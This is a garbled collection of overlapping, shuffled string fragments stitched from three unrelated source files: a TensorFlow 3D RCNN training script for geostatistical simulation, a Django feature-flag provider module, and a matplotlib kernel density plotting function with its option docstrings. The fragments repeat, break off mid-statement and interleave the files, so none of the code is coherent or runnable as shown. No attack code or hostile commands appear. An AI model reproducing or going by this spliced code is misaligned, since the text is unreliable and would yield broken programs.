It has been developed by <NAME> and <NAME> in", "Num 3 HyperPar.append(int(7)) # Search_y - Num 4 HyperPar.append(int(7)) #", "# Search_y - Num 4 HyperPar.append(int(7)) # Search_z - Num", "3D for categorical variables. It has been developed by <NAME>", "Queen's University - Canada\"\"\" # Do not display the AVX", "further improvements are well recevied to: <EMAIL> April 16, 2019.", "Num 9 .. divided by 3 so 1% is 10", "10 PointStart = 1 for indTrain in range(Ncicles): #HyperPar[9] =", "SGsizex - Num 0 HyperPar.append(50) # SGsizey - Num 1", "cuos < StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR,", "int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\")", "and <NAME> in the Geometallurygical Group at Queen's University as", "tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"", "int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]),", "10 represents 1% HyperPar.append(1) # MinDC - Num 10 HyperPar.append(1500)", "int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) #", "num of categories - Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP:", "1 #Nbatch = 250 Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\"", "of the RCNN approach to perform MPS in 3D for", "int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))", "np import tensorflow as tf import time import External_Functions_3D as", "Do not display the AVX message about using GPU import", "message about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from", "- Num 13 HyperPar.append(2) # num of categories - Num", "HyperPar.append(int(7)) # IPsizez - Num 8 HyperPar.append(50) # Percentage of", "seconds of whole training process-\" % (np.around((time.time() - start_time_1), decimals=2)))", "StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7) else:", "import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices())", "DBname=TrainingImage, Lvl=3,Training=False, 
Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01, 0.001", "save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png',", "# IPsizez - Num 8 HyperPar.append(50) # Percentage of Data", "- Num 0 HyperPar.append(50) # SGsizey - Num 1 HyperPar.append(50)", "int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]),", "a PhD program. The code is not free of bugs", "print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar,", "Level=1) MaxLR, MinLR = 0.01, 0.001 StepLR = 10 PointStart", "# num of categories - Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]),", "= '2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see", "categorical variables. It has been developed by <NAME> and <NAME>", "decimals=7) else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) +", "but running end-to-end. Any comments and further improvements are well", "int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile", "LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the TI TempSimGrid =", "SGsizez - Num 2 HyperPar.append(int(7)) # Search_x - Num 3", "IPsizez - Num 8 HyperPar.append(50) # Percentage of Data Conditioning", "Num Fully Connected - Num 11 HyperPar.append(3) # wdnh -", "and further improvements are well recevied to: <EMAIL> April 16,", "= 10 PointStart = 1 for indTrain in range(Ncicles): #HyperPar[9]", "tf import time import External_Functions_3D as fns_nested import gc for", "Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole training process-\" %", "# SGsizez - Num 2 HyperPar.append(int(7)) # Search_x - Num", "process-\" % (np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s", "HyperPar.append(50) # SGsizex - Num 0 HyperPar.append(50) # SGsizey -", "#print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import", "(\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage,", "of whole training process-\" % (np.around((time.time() - start_time_1), decimals=2))) gc.collect()" ]
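The cuos = indTrain % (2 * StepLR) arithmetic implements a triangular, cyclical learning-rate schedule: the rate climbs linearly from MinLR toward MaxLR over StepLR cycles, then falls back over the next StepLR cycles, repeating every 2 * StepLR cycles. A standalone sketch of the values it produces, assuming the MaxLR=0.01, MinLR=0.001, StepLR=10 settings used above:

import numpy as np

MaxLR, MinLR, StepLR = 0.01, 0.001, 10
for indTrain in range(2 * StepLR):  # one full period of the schedule
    cuos = indTrain % (2 * StepLR)
    if cuos < StepLR:
        lr = np.around(((MaxLR - MinLR) / StepLR) * cuos + MinLR, decimals=7)
    else:
        lr = np.around(((MaxLR - MinLR) / StepLR) * (StepLR - cuos) + MaxLR, decimals=7)
    print(indTrain, lr)
# Ramps 0.001 -> 0.0091 over the first ten cycles, peaks at 0.01, then
# decays to 0.0019 before the pattern repeats every twenty cycles.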
[ "request: HttpRequest) -> bool: from django.conf import settings is_enabled =", "from django.conf import settings is_enabled = False attributes = _attributes_from_request(request)", "= False attributes = _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name,", "must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict: if not", "def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool: from django.conf import", "feature-attributes.\" ) return dict() def is_feature_enabled(feature_name: str, request: HttpRequest) ->", "Dict = None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request:", "logger.exception( \"Unexpected exception while trying to parse http-request for feature-attributes.\"", "django.conf import settings is_enabled = False attributes = _attributes_from_request(request) try:", "parse http-request for feature-attributes.\" ) return dict() def is_feature_enabled(feature_name: str,", "None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) ->", "import HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name:", "class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id: str = None,", "from django.http import HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider: def", "return dict() attributes = dict() try: attributes[\"is_staff\"] = request.user.is_staff return", "logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id: str =", "= None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest)", "def _attributes_from_request(request: HttpRequest) -> Dict: if not request: return dict()", "_attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature", "return attributes except Exception: logger.exception( \"Unexpected exception while trying to", "settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except", "return dict() def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool: from", "http-request for feature-attributes.\" ) return dict() def is_feature_enabled(feature_name: str, request:", "def is_feature_enabled(self, feature_name: str, user_id: str = None, attributes: Dict", "dict() attributes = dict() try: attributes[\"is_staff\"] = request.user.is_staff return attributes", "FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict: if not request: return", "is_feature_enabled(feature_name: str, request: HttpRequest) -> bool: from django.conf import settings", "user_id: str = None, attributes: Dict = None): raise NotImplementedError(\"You", "except Exception: logger.exception( \"Unexpected exception while trying to parse http-request", "exception while trying to parse http-request for feature-attributes.\" ) return", "attributes except Exception: logger.exception( \"Unexpected exception while 
trying to parse", "FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id: str = None, attributes:", "enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying to check feature-flag state", "logger.exception(f\"Exception while trying to check feature-flag state for '{feature_name}'\") return", "request: return dict() attributes = dict() try: attributes[\"is_staff\"] = request.user.is_staff", ") logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying", "is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying to check feature-flag", "django.http import HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self,", "attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while", "= settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\")", "while trying to check feature-flag state for '{feature_name}'\") return is_enabled", "attributes = dict() try: attributes[\"is_staff\"] = request.user.is_staff return attributes except", "'{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying to check", "except Exception: logger.exception(f\"Exception while trying to check feature-flag state for", "logging from typing import Dict from django.http import HttpRequest logger", "dict() try: attributes[\"is_staff\"] = request.user.is_staff return attributes except Exception: logger.exception(", "attributes = _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes", "bool: from django.conf import settings is_enabled = False attributes =", "request.user.is_staff return attributes except Exception: logger.exception( \"Unexpected exception while trying", "NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict: if", "dict() def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool: from django.conf", "\"Unexpected exception while trying to parse http-request for feature-attributes.\" )", "to parse http-request for feature-attributes.\" ) return dict() def is_feature_enabled(feature_name:", "False attributes = _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\",", "= None, attributes: Dict = None): raise NotImplementedError(\"You must override", "is_feature_enabled(self, feature_name: str, user_id: str = None, attributes: Dict =", "for feature-attributes.\" ) return dict() def is_feature_enabled(feature_name: str, request: HttpRequest)", "import settings is_enabled = False attributes = _attributes_from_request(request) try: is_enabled", "logger = logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id:", "attributes[\"is_staff\"] = request.user.is_staff return attributes except Exception: logger.exception( \"Unexpected exception", "Dict from django.http import HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider:", "if not request: return dict() attributes = dict() try: 
attributes[\"is_staff\"]", "Exception: logger.exception(f\"Exception while trying to check feature-flag state for '{feature_name}'\")", "override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict: if not request:", "raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict:", "user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception", "settings is_enabled = False attributes = _attributes_from_request(request) try: is_enabled =", "str = None, attributes: Dict = None): raise NotImplementedError(\"You must", "HttpRequest) -> bool: from django.conf import settings is_enabled = False", "= logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id: str", "import Dict from django.http import HttpRequest logger = logging.getLogger(__name__) class", "import logging from typing import Dict from django.http import HttpRequest", "try: attributes[\"is_staff\"] = request.user.is_staff return attributes except Exception: logger.exception( \"Unexpected", "try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}'", "logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying to", "str, user_id: str = None, attributes: Dict = None): raise", "Exception: logger.exception( \"Unexpected exception while trying to parse http-request for", "HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str,", "typing import Dict from django.http import HttpRequest logger = logging.getLogger(__name__)", "= request.user.is_staff return attributes except Exception: logger.exception( \"Unexpected exception while", "feature_name: str, user_id: str = None, attributes: Dict = None):", "= dict() try: attributes[\"is_staff\"] = request.user.is_staff return attributes except Exception:", "None, attributes: Dict = None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\")", "_attributes_from_request(request: HttpRequest) -> Dict: if not request: return dict() attributes", "Dict: if not request: return dict() attributes = dict() try:", "-> bool: from django.conf import settings is_enabled = False attributes", "trying to parse http-request for feature-attributes.\" ) return dict() def", "= _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes )", "is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is", "from typing import Dict from django.http import HttpRequest logger =", "not request: return dict() attributes = dict() try: attributes[\"is_staff\"] =", "attributes: Dict = None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def", "feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception:", "-> Dict: if not request: return dict() attributes = dict()", "str, request: 
HttpRequest) -> bool: from django.conf import settings is_enabled", "HttpRequest) -> Dict: if not request: return dict() attributes =", ") return dict() def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool:", "while trying to parse http-request for feature-attributes.\" ) return dict()", "is_enabled = False attributes = _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled(" ]
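A minimal usage sketch of the provider interface above: any object exposing is_feature_enabled() can be assigned to settings.FEATURE_FLAG_PROVIDER, which is the only contract the module relies on. The StaticFeatureFlagProvider class and the "new_dashboard" flag below are hypothetical, not part of the module.

# Hypothetical concrete provider (a sketch, not part of the module above).
class StaticFeatureFlagProvider(FeatureFlagProvider):
    """Enable a fixed set of features; staff users see everything."""

    def __init__(self, enabled_features=None):
        self.enabled_features = set(enabled_features or [])

    def is_feature_enabled(self, feature_name: str, user_id: str = None, attributes: Dict = None):
        attributes = attributes or {}
        # `is_staff` is the attribute extracted by _attributes_from_request().
        if attributes.get("is_staff"):
            return True
        return feature_name in self.enabled_features


# Hypothetical wiring in settings.py:
#     FEATURE_FLAG_PROVIDER = StaticFeatureFlagProvider(enabled_features={"new_dashboard"})
#
# In a view:
#     if is_feature_enabled("new_dashboard", request):
#         return render(request, "dashboard_v2.html")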
[ "for each time series. sharex [optional, default to True] In", "| green | +------+---------+ | r | red | +------+---------+", "1], # ytitle=[str, [\"pass\", []], 1], # title=[str, [\"pass\", []],", "\"log\": logy = True xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim =", "take for the standard linestyles list. \"\"\" plt = kde(", "values to end each vertical line. If a list must", "marker types. Otherwise on the command line a comma separated", "[]], 1], # label_skip=[int, [\"range\", [1, None]], 1], # drawstyle=[str,", "\"seaborn-notebook\", # \"seaborn-paper\", # \"seaborn-pastel\", # \"seaborn-poster\", # \"seaborn-talk\", #", "The styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\" are all", "# \"vibrant\", # \"muted\", # \"retro\", # ], # ],", "--logx use --xaxis=\"log\" * For --logy use --yaxis=\"log\" * For", "\"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors,", "a list must be same length as `hlines_y`. If a", "all vertical lines. If a list must be same length", "[ # \"domain\", # [ # \"classic\", # \"Solarize_Light2\", #", "s | square | +-------+----------------+ | p | pentagon |", "the maximum x value for the entire plot. hlines_colors: [optional,", "the implementation of # mando legend = bool(legend == \"\"", "ylim=[float, [\"pass\", []], 2], # xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1],", "the various time-series automatically. scatter_matrix_diagonal : str [optional, defaults to", "+-------+----------------+ | 4 | tri_right | +-------+----------------+ | 8 |", "nylim[0] if vlines_ymax is None: vlines_ymax = nylim[1] if type", "and gray, however the \"ieee\" also will change the chart", "None], # bar_hatchstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \"", "[\"auto\", None, \"\", \" \", \" \"] + plotutils.HATCH_LIST], None],", "| > | triangle right | +-------+----------------+ | 1 |", "clean=clean, skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize, legend=legend,", "Description | +=================+===================+ | / | diagonal hatching | +-----------------+-------------------+", "4. Any of the HTML color names. +------------------+ | HTML", "[]], 1], # subplots=[bool, [\"domain\", [True, False]], 1], # sharex=[bool,", "defaults to None] List of colors for the vertical lines.", "legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim, ylim=ylim, secondary_y=secondary_y,", "import absolute_import, division, print_function import itertools import os import warnings", "[\"pass\", []], None], # hlines_colors=[str, [\"pass\", []], None], # hlines_linestyles=[", "to plot. You supplied '{}' for style which has {}", "+-------+----------------+ | None | nothing | +-------+----------------+ | ' '", "however the \"ieee\" also will change the chart size to", "the maximum x value for all vertical lines. A missing", "maximum x value for the entire plot. hlines_colors: [optional, defaults", "+-------+----------------+ | x | x | +-------+----------------+ | D |", "upper limits for the y-axis of the plot. See `xlim`", "[optional, defaults to 'plot.png'] Output filename for the plot. 
Extension", "| +---------+--------------+ | : | dotted | +---------+--------------+ | None", "else: markerstyles = tsutils.make_list(markerstyles) if markerstyles is None: markerstyles =", "| m | magenta | +------+---------+ | y | yellow", "clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None,", "ylim [optional, default is based on range of y values]", "ylim=ylim, secondary_y=secondary_y, figsize=figsize, ) for index, line in enumerate(ax.lines): if", "None: if type in [\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x))", "defaults to 'kde'] If plot type is 'scatter_matrix', this specifies", "= [\" \"] else: linestyles = [\" \" if i", "The default ' ' will not plot a marker. If", "hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds,", "hlines_colors: [optional, defaults to None] List of colors for the", "plot_styles ] plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2) _, ax =", "def kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None,", "lag_plot_lag [optional, default to 1] The lag used if ``type``", "'markerstyles' options. Currently the 'style' option will override the others.", "# xlim=[float, [\"pass\", []], 2], # ylim=[float, [\"pass\", []], 2],", "to start the horizontal line. If a list must be", "For --logx use --xaxis=\"log\" * For --logy use --yaxis=\"log\" *", "False]], 1], # colors=[str, [\"pass\", []], None], # linestyles=[str, [\"domain\",", "( logx is True or logy is True or norm_xaxis", "[optional, default to 'auto'] If 'auto' will iterate through the", "color pallette in the current plot style. vlines_linestyles: [optional, defaults", "missing value or None will end at the maximum x", "``type`` \"lag_plot\" is chosen. xtitle : str [optional, default depends", "- | horizontal | +-----------------+-------------------+ | + | crossed |", "is to help pretty print the frequency try: try: pltfreq", "None: markerstyles = \" \" if style != \"auto\": nstyle", "[optional, default to ' '] The default ' ' will", "[]], None], # xlim=[float, [\"pass\", []], 2], # ylim=[float, [\"pass\",", "| tri_up | +-------+----------------+ | 3 | tri_left | +-------+----------------+", "enumerate(ax.lines): if icolors is not None: c = next(icolors) else:", "hlines_y | +-------+----------------+ | None | nothing | +-------+----------------+ |", "+------------------+ | burlywood | +------------------+ | chartreuse | +------------------+ |", "index, line in enumerate(ax.lines): if icolors is not None: c", "ytitle : str [optional, default depends on ``type``] Title of", "this specifies the plot along the diagonal. One of 'kde'", "Color | +======+=========+ | b | blue | +------+---------+ |", "defaults to None] List of linestyles for the horizontal lines.", "matplotlib colors in the chosen style. At the command line", "if style != \"auto\": nstyle = tsutils.make_list(style) if len(nstyle) !=", "_ | hlines_y | +-------+----------------+ | None | nothing |", "or within Python a list of color code strings. Can", "of using the 'style' keyword. +-------+----------------+ | Code | Markers", "# Only for bar, barh, bar_stacked, and barh_stacked. ibar_hatchstyles =", "strings for each time-series in the data set. 
subplots [optional,", "of probability density function. \"kde\" will create a plot of", "| -. | dash_dot | +---------+--------------+ | : | dotted", "invert_yaxis [optional, default is False] Invert the y-axis. plotting_position :", "is None) type = \"kde\" import matplotlib matplotlib.use(\"Agg\") import matplotlib.pyplot", "lines. A missing value or None will end at the", "'auto' will iterate through the available matplotlib marker types. Otherwise", "# markerstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"]", "\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]: if hlines_y is", "example 'filename.png' will create a PNG file. If used within", "horizontal line. hlines_xmin: [optional, defaults to None] List of minimum", "If a single color then will be used as the", "color code strings. Can identify colors in four different ways.", "ax = tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy,", "label_rotation : int [optional] Rotation for major labels for bar", "| None | nothing | +-------+----------------+ | ' ' |", "``|`` | vertical | +-----------------+-------------------+ | - | horizontal |", "1] The lag used if ``type`` \"lag_plot\" is chosen. xtitle", "with color blindness. Black, White, and Gray Styles The \"ieee\"", "\" \", \" \"] + plotutils.HATCH_LIST], None], # style=[str, [\"pass\",", "True xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles", "produce step-plots. 'steps' is equivalent to 'steps-pre' and is maintained", "current style. 2. Single character code from the table below.", "upper limit to 1000. ylim [optional, default is based on", "subplots=[bool, [\"domain\", [True, False]], 1], # sharex=[bool, [\"domain\", [True, False]],", "default is 'arithmetic'] Defines the type of the xaxis. One", "the maximum x value for all horizontal lines. A missing", "markerstyles = plotutils.MARKER_LIST else: markerstyles = tsutils.make_list(markerstyles) if markerstyles is", "for st in nstyle: colors.append(st[0]) if len(st) == 1: markerstyles.append(\"", "50] The size of the random subset for 'bootstrap' plot.", "None] Number or list of y values where to place", "plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors,", "for Kernel Density Estimation or 'hist' for a histogram. bootstrap_size", "histogram. bootstrap_size : int [optional, defaults to 50] The size", "| +=======+================+ | . | point | +-------+----------------+ | o", "norm_xaxis is True or norm_yaxis is True or lognorm_xaxis is", "you have {} time-series. \"\"\".format( style, len(nstyle), len(tsd.columns) ) )", "Can identify colors in four different ways. 1. Use 'CN'", "multiple styles then each over rides some or all of", "# \"grayscale\", # \"seaborn\", # \"seaborn-bright\", # \"seaborn-colorblind\", # \"seaborn-dark\",", "codes in 'ColorMarkerLine' order, for example 'r*--' is a red", "defaults to 500] The number of random subsets of 'bootstrap_size'.", "time-series. \"\"\".format( style, len(nstyle), len(tsd.columns) ) ) ) colors =", "diamond | +-------+----------------+ | d | thin diamond | +-------+----------------+", "line where x == y. 
Set to a line style", "| +-----------------+-------------------+ | ``|`` | vertical | +-----------------+-------------------+ | -", "OR (2 day) short_freq = \"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq =", "is True or lognorm_xaxis is True or lognorm_yaxis is True", "be same length as `vlines_x`. If None will take for", "g | green | +------+---------+ | r | red |", "through matplotlib colors in the chosen style. At the command", "division, print_function import itertools import os import warnings import mando", "a list must be same length as `hlines_y`. If None", "+-------+----------------+ | _ | hlines_y | +-------+----------------+ | None |", "[optional, defaults to 'kde'] If plot type is 'scatter_matrix', this", "vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( # ofilename=[str, [\"pass\", []], 1], #", "backward-compatibility. ACCEPTS:: ['default' | 'steps' | 'steps-pre' | 'steps-mid' |", "The \"ieee\" style is appropriate for black, white, and gray,", "] plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2) _, ax = plt.subplots(figsize=figsize)", "in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin,", "the time-series names associated with the input data. The 'legend_names'", "characteristics of the previous. Color Blind Appropriate Styles The styles", "False] Whether to plot on the secondary y-axis. If a", "[optional, defaults to True] Whether to display the legend. legend_names", "'--yaxis=\"log\"' instead. xlim [optional, default is based on range of", "in a column of the \"IEEE\" journal. The \"grayscale\" is", "useful for photo-copyable black, white, nd gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html", "style code. grid [optional, default is False] Whether to plot", ": str [optional, default is 'descending'] How to sort the", "invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None,", "invert_xaxis [optional, default is False] Invert the x-axis. invert_yaxis [optional,", "tri_right | +-------+----------------+ | 8 | octagon | +-------+----------------+ |", "[optional, default depends on ``type``] Title of y-axis. title :", "colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\",", "burlywood | +------------------+ | chartreuse | +------------------+ | ...etc. |", "yaxis. One of 'arithmetic', 'log'. secondary_y [optional, default is False]", "plots. drawstyle : str [optional, default is 'default'] 'default' connects", "\"\"\" plt = kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows,", "'--xlim ,1000' would base the lower limit on the data", "minimum x values to start the horizontal line. If a", "markerstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"] +", "the available matplotlib hatch types. Otherwise on the command line", "triangle 